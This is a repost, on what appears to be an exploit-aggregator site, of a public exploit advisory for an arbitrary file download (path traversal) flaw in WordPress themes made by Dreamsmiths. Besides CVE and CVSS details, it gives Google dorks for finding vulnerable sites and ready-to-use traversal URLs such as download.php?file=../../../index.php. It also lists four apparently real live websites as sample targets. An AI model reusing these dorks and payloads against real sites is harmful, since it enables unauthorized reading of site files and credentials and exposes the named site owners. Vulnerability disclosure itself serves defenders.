Advertisement






WordPress Dreamsmiths Themes 0.0.1 Arbitrary File Download

CVE Category Price Severity
CVE-2021-24863 CWE-22 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2018-08-18
CPE
cpe:cpe:/a:wordpress:dreamsmiths_themes:0.0.1
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 0.021 0.989

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018080122

Below is a copy:

WordPress Dreamsmiths Themes 0.0.1 Arbitrary File Download
# Exploit Title: UWordpress dreamsmiths Themes Arbitrary File Download
# Google Dork: inurl:/wp-content/themes/fiestaresidences/
inurl:wp-content/themes/hsv/ inurl:wp-content/themes/erinvale/
# Date: 2018/01/08
# Exploit Author: IRaNHaCK Security Team
# Vendor Homepage: iranhack.com
# Software Link: http://www.dreamsmiths.com/
# Version: 0.0.1
# Tested on: 7 , KAli




P0c:

Arbitrary Download PHP File in all WordPress themes By dreamsmiths :
site.com/wp-content/themes/fiestaresidences/download.php?file=../../../index.phpsite.com/wp-content/themes/optimus/download.php?file=../../../index.phpsite.com/wp-content/themes/erinvale/download.php?file=../../../index.phpsite.com/wp-content/themes/hsv/download.php?file=../../../index.php

Sample:
https://fiestaresidences.com/wp-content/themes/fiestaresidences/download.php?file=download.php
https://erinvale.co.za/wp-content/themes/erinvale/download.php?file=download.php
https://hsvhospitality.com/wp-content/themes/hsv/download.php?file=download.php
http://www.optimusproperty.net/wp-content/themes/optimus/download.php?file=download.php

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.